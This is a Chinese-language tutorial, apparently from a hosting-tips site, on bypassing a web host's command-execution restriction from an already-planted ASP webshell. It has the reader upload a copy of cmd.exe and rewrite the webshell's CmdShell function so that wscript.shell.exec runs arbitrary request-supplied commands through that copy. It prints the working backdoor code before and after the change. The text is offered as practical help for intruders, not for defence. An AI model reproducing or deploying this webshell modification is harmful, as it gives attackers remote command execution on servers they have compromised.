有很多朋友問他得到了一個WEBSHELL,但是想用命令提示查看用戶信息什么的,但是很多主機(jī)限制了執(zhí)行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站長助手6.0剛出來����,我就以ASP站長助手6.0為例把它上傳到一個禁止執(zhí)行的虛擬主機(jī)���,然后上傳一個CMD.exe,然后調(diào)用你上傳的CMD來執(zhí)行命令......
本來想搞圖文教程的��,但感覺太簡單�����,文字就可以說明清楚了
1.打開ASP站長助手6.0點(diǎn)擊命令提示符��,顯示"沒有權(quán)限"
2.用ASP站長助手6.0上傳功能上傳一個CMD.exe(在WIN\system32\cmd.exe)到你的WEBSHELL目錄(其它目錄也行��,把上傳以后的CMD.exe絕對路徑COPY出來)
3.修改你的webshell找到調(diào)用CMD.exe的代碼
Function CmdShell()
If Request("cmd")<>"" Then
DefCmd = Request("cmd")
Else
DefCmd = "Dir "&Session("FolderPath")
End If
SI="
"
SI=SI&""
SI=SI&""
<br> SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
<br> SI=SI&Chr(13)&"Rar命令行壓縮示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1"
Response.Write SI
End Function
修改成以下載的代碼
Function CmdShell()
If Request("cmd")<>"" Then
DefCmd = Request("cmd")
Else
DefCmd = "Dir "&Session("FolderPath")
End If
SI=" "
SI=SI&""
SI=SI&""
<br> SI=SI&server.createobject("wscript.shell").exec("你想上傳的cmd.exe絕對路徑 /c "&DefCmd).stdout.readall
<br> SI=SI&Chr(13)&"Rar命令行壓縮示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1
"
Response.Write SI
End Function
為了大家看得清楚把要修改的提出來就可以
原來的:
SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
修改成:
SI=SI&server.createobject("wscript.shell").exec("你想上傳的cmd.exe絕對路徑 /c "&DefCmd).stdout.readall
比如你上偉到的目錄是D:\web\www\cmd.exe那么就修改成:
SI=SI&server.createobject("wscript.shell").exec("D:\web\www\cmd.exe /c "&DefCmd).stdout.readall
這樣你的WEBSHELL中的命令提示符就可以用了......
域名注冊知識
虛擬主機(jī)知識
網(wǎng)站建設(shè)知識
網(wǎng)絡(luò)推廣知識
網(wǎng)絡(luò)營銷知識
常見技術(shù)問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)
